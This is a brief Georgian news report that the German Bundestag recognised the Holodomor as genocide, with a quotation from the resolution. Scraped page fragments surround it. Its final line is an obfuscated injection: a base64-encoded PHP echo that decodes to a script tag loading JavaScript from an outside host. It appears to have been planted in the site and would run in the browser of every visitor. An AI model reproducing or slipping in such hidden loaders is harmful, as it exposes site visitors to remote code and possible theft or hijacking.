celsiusi
ავერსი საქკაბელი
გერმანიის ბუნდესტაგმა რეზოლუცია მიიღო, რომლითაც გენოციდად აღიარებს ჰოლოდომორს უკრაინაში.
 
როგორც გერმანელმა დეპუტატებმა განაცხადეს, ჰოლოდომორი კაცობრიობის წინაშე ჩადენილი დანაშაულია და დღევანდელი პოზიციიდან ცხადია, მისი, როგორც გენოციდის ისტორიულ-პოლიტიკური კლასიფიკაცია.
„შიმშილით მასობრივი სიკვდილი არ იყო მოსავლის არქონის შედეგი, ეს იყო იოსებ სტალინის საბჭოთა კავშირის პოლიტიკური ლიდერების პასუხისმგებლობა. ჰოლოდომორი კაცობრიობის წინაშე ჩადენილი დანაშაულია და დღევანდელი პოზიციიდან ცხადია, მისი, როგორც გენოციდის ისტორიულ-პოლიტიკური კლასიფიკაცია. უკვე 1931/1932 წლის ზამთრისთვის ასობით ათასი ადამიანი დაიღუპა შიმშილისგან სოფლებში. მიუხედავად ამისა, გრძელდებოდა მოსავლის ძალადობრივი რეკვიზიცია. შიმშილი გამოიყენებოდა, როგორც დამატებითი სასჯელი, სათანადო მოცულობით შეუსრულებლობის შემთხვევაში კი, მოითხოვდნენ და კონფისკაცია დამატებით ეხებოდა მარცვლეულსა და სხვა პროდუქტებს. დაზარალებული რაიონები შემოსაზღვრული იყო, რომ მოშიმშილეები ქალაქიდან არ გაქცეულიყვნენ, საკვები კი რეგიონებში არ მიეწოდებინათ“, – ნათქვამია მიღებულ რეზოლუციაში.
417
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");